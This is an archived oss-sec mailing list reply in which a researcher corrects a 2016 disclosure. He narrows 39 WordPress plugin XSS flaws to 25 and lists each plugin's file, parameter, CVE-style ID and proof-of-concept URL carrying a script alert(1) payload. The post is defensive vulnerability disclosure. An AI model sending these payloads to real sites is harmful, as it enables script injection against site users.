oss-sec mailing list archives

Re: 39 XSS vulnerabilities in 35 wordpress plugins.

From: "Larry W. Cashdollar" <larry0 () me com>
Date: Thu, 14 Apr 2016 13:07:58 -0400

Hi List,

This morning I realized a flaw in my testing methodology, I used php5-cgi on the command line setting environment 
variables to pass the XSS payload
to the vulnerable php code.  What I failed to realize is that if the plugin code was setting a content-header this 
would be missed when I used phantomJS to render
the html output and execute any JS I had injected.  The result is only 25 of the plugins are exploitable.  The other 14 
aren't XSSable because they set the content header 
to something the browser doesn't render.  Here is a list of the remaining plugins.  I'm sorry for my mistake.

Plugin:https://wordpress.org/plugins/indexisto File:./indexisto/assets/js/indexisto-inject.php 
Parameter:indexisto_index CVEID:2016-77360 
PoC:hxxp://[target]/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/whizz File:./whizz/plugins/delete-plugin.php Parameter:plugin CVEID:2016-77799 
PoC:hxxp://[target]/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/anti-plagiarism File:./anti-plagiarism/js.php Parameter:m CVEID:2016-77035 
PoC:hxxp://[target]/wp-content/plugins/anti-plagiarism/js.php?m="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/s3-video File:./s3-video/views/video-management/preview_video.php Parameter:media 
CVEID:2016-77600 
PoC:hxxp://[target]/wp-content/plugins/s3-video/views/video-management/preview_video.php?media="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/wpsolr-search-engine 
File:./wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php Parameter:page  
tab CVEID:2016-77958 
PoC:hxxp://[target]/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/page-layout-builder File:./page-layout-builder/includes/layout-settings.php 
Parameter:layout_settings_id CVEID:2016-77503 
PoC:hxxp://[target]/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/date_select.php Parameter:date-from date-to 
CVEID:2016-77217 
PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/date_select.php?date-from="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/title_az.php Parameter:title_az CVEID:2016-77217 
PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/title_az.php?title_az="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/tidio-gallery File:./tidio-gallery/popup-insert-help.php Parameter:galleryId id  
tidio-gallery CVEID:2016-77727 
PoC:hxxp://[target]/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/parsi-font File:./parsi-font/css.php Parameter:font size CVEID:2016-77506 
PoC:hxxp://[target]/wp-content/plugins/parsi-font/css.php?size="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/defa-online-image-protector File:./defa-online-image-protector/redirect.php 
Parameter:r CVEID:2016-77193 
PoC:hxxp://[target]/wp-content/plugins/defa-online-image-protector/redirect.php?r="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/new-year-firework File:./new-year-firework/firework/index.php Parameter:music text 
url CVEID:2016-77475 
PoC:hxxp://[target]/wp-content/plugins/new-year-firework/firework/index.php?text="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/simpel-reserveren File:./simpel-reserveren/edit.php Parameter:page 
CVEID:2016-77628 PoC:hxxp://[target]/wp-content/plugins/simpel-reserveren/edit.php?page="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/ajax-random-post File:./ajax-random-post/js.php Parameter:count interval 
CVEID:2016-77022 PoC:hxxp://[target]/wp-content/plugins/ajax-random-post/js.php?interval="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/admin-font-editor File:./admin-font-editor/css.php Parameter:font size 
CVEID:2016-77009 PoC:hxxp://[target]/wp-content/plugins/admin-font-editor/css.php?size="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/playlist.php Parameter:playlist CVEID:2016-77337 
PoC:hxxp://[target]/wp-content/plugins/hdw-tube/playlist.php?playlist="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/mychannel.php Parameter:channel CVEID:2016-77337 
PoC:hxxp://[target]/wp-content/plugins/hdw-tube/mychannel.php?channel="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hero-maps-pro File:./hero-maps-pro/views/dashboard/index.php Parameter:p v 
CVEID:2016-77341 
PoC:hxxp://[target]/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/edit_styles.php Parameter:gid 
CVEID:2016-77517 
PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/edit_styles.php?gid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/build.php Parameter:gid 
CVEID:2016-77517 
PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/pondol-formmail File:./pondol-formmail/pages/admin-mail-info.php Parameter:itemid 
CVEID:2016-77532 
PoC:hxxp://[target]/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/heat-trackr File:./heat-trackr/heat-trackr_abtest_add.php Parameter:id N  WPSLT 
CVEID:2016-77339 
PoC:hxxp://[target]/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/tidio-form File:./tidio-form/popup-insert-help.php Parameter:formId id  tidio-form 
CVEID:2016-77726 
PoC:hxxp://[target]/wp-content/plugins/tidio-form/popup-insert-help.php?formId="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/simplified-content File:./simplified-content/ooawpframework/js/ajax/OOAAjax.js.php 
Parameter:ajaxURL CVEID:2016-77642 
PoC:hxxp://[target]/wp-content/plugins/simplified-content/ooawpframework/js/ajax/OOAAjax.js.php?ajaxURL="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/infusionsoft File:./infusionsoft/Infusionsoft/examples/leadscoring.php 
Parameter:ContactId CVEID:2016-77364 
PoC:hxxp://[target]/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="><script>alert(1);</script><"

Advisories here: http://www.vapidlabs.com/wp/wp.php


Again my apologies,
Larry

On Apr 12, 2016, at 8:48 AM, Larry W. Cashdollar <larry0 () me com> wrote:

Hello List,


This was a project I worked on as part of my research in Akamai's SIRT, I initially found 1352 suspect XSS 
vulnerabilities but Wordpress escapes super globals GET/POST/REQUEST
https://core.trac.wordpress.org/ticket/18322.  I didn't know this at the time, so now I have a database of 
vulnerabilities that are context dependent and would need to be examined
individually.  I managed to automate XSS testing against the database and of 1352 39 successfully executed 
javascript.  These are those 39, I've manually verified they're still vulnerable.

They're available here http://www.vapidlabs.com/wp/wp.php

Current thread:

39 XSS vulnerabilities in 35 wordpress plugins. Larry W. Cashdollar (Apr 12)
- Re: 39 XSS vulnerabilities in 35 wordpress plugins. Larry W. Cashdollar (Apr 13)
- Re: 39 XSS vulnerabilities in 35 wordpress plugins. Larry W. Cashdollar (Apr 14)